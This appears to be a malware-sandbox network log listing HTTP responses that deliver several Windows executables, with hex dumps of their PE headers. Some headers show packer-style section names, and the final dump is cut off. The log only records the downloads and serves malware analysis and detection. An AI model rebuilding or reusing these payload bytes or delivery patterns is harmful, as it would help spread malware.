Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 16:59:16 GMTContent-Type: application/octet-streamContent-Length: 1781248Last-Modified: Fri, 07 Feb 2025 15:44:43 GMTConnection: keep-aliveETag: "67a62a6b-1b2e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 a2 a9 0c f0 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 74 01 00 00 08 00 00 00 00 00 00 00 c0 46 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 47 00 00 04 00 00 6d 44 1b 00 03 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 c0 01 00 69 00 00 00 00 a0 01 00 4c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 c1 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 01 00 00 20 00 00 00 a4 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 4c 05 00 00 00 a0 01 00 00 04 00 00 00 c4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 c0 01 00 00 02 00 00 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 80 2a 00 00 e0 01 00 00 02 00 00 00 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 66 79 75 78 6c 61 76 00 40 1a 00 00 60 2c 00 00 3c 1a 00 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 6f 6c 6d 6c 75 74 72 00 20 00 00 00 a0 46 00 00 04 00 00 00 08 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 c0 46 00 00 22 00 00 00 0c 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 16:59:21 GMTContent-Type: application/octet-streamContent-Length: 1870336Last-Modified: Fri, 07 Feb 2025 16:43:24 GMTConnection: keep-aliveETag: "67a6382c-1c8a00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 12 25 9e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 66 04 00 00 ae 00 00 00 00 00 00 00 e0 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 4a 00 00 04 00 00 32 23 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 90 05 00 6b 00 00 00 00 80 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 05 00 00 10 00 00 00 8a 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 80 05 00 00 02 00 00 00 9a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 05 00 00 02 00 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 2a 00 00 a0 05 00 00 02 00 00 00 9e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 74 6d 6a 6c 6b 79 66 00 d0 19 00 00 00 30 00 00 c4 19 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 7a 6b 6b 64 79 63 76 00 10 00 00 00 d0 49 00 00 04 00 00 00 64 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 49 00 00 22 00 00 00 68 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 16:59:25 GMTContent-Type: application/octet-streamContent-Length: 1961984Last-Modified: Fri, 07 Feb 2025 16:04:45 GMTConnection: keep-aliveETag: "67a62f1d-1df000"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 12 f0 a4 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 62 04 00 00 ac 00 00 00 00 00 00 00 50 4d 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 4d 00 00 04 00 00 cb b8 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 05 00 6b 00 00 00 00 90 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 05 00 00 10 00 00 00 92 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 90 05 00 00 02 00 00 00 a2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 05 00 00 02 00 00 00 a4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 2c 00 00 b0 05 00 00 02 00 00 00 a6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 6a 69 6c 77 6b 72 6d 00 30 1b 00 00 10 32 00 00 22 1b 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 71 61 74 63 6e 6b 70 00 10 00 00 00 40 4d 00 00 04 00 00 00 ca 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 4d 00 00 22 00 00 00 ce 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 16:59:31 GMTContent-Type: application/octet-streamContent-Length: 1832960Last-Modified: Fri, 07 Feb 2025 16:04:54 GMTConnection: keep-aliveETag: "67a62f26-1bf800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 df 68 a3 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 60 6a 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 6a 00 00 04 00 00 77 21 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 8c 03 00 00 00 a0 24 00 00 04 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2b 00 00 c0 24 00 00 02 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 63 68 6b 76 6d 6d 69 00 60 1a 00 00 f0 4f 00 00 52 1a 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 64 66 6f 7a 66 6a 77 00 10 00 00 00 50 6a 00 00 04 00 00 00 d2 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 6a 00 00 22 00 00 00 d6 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 16:59:36 GMTContent-Type: application/octet-streamContent-Length: 968192Last-Modified: Fri, 07 Feb 2025 16:02:21 GMTConnection: keep-aliveETag: "67a62e8d-ec600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 64 2e a6 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 16 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 0f 00 00 04 00 00 41 cd 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 a8 5b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 5b 01 00 00 40 0d 00 00 5c 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 a0 0e 00 00 76 00 00 00 50 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 16:59:41 GMTContent-Type: application/octet-streamContent-Length: 961024Last-Modified: Fri, 07 Feb 2025 16:02:08 GMTConnection: keep-aliveETag: "67a62e80-eaa00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 6b 2e a6 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 fa 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 0f 00 00 04 00 00 c7 1b 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 48 3e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 48 3e 01 00 00 40 0d 00 00 40 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 80 0e 00 00 76 00 00 00 34 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 16:59:49 GMTContent-Type: application/octet-streamContent-Length: 6352896Last-Modified: Thu, 06 Feb 2025 05:56:28 GMTConnection: keep-aliveETag: "67a44f0c-60f000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 76 74 9e df 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 2a 01 00 00 08 00 00 00 00 00 00 0e 49 01 00 00 20 00 00 00 60 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 61 00 00 06 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 48 01 00 4b 00 00 00 00 60 01 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 01 00 0c 00 00 00 78 48 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 29 01 00 00 20 00 00 00 2a 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 05 00 00 00 60 01 00 00 06 00 00 00 30 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 01 00 00 02 00 00 00 36 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 64 61 74 61 00 00 00 dc 2f 00 00 a0 01 00 00 dc 2f 00 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 00 dc 2f 00 00 80 31 00 00 dc 2f 00 00 14 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 16:59:47 GMTContent-Type: application/octet-streamContent-Length: 2104320Last-Modified: Fri, 07 Feb 2025 16:05:04 GMTConnection: keep-aliveETag: "67a62f30-201c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 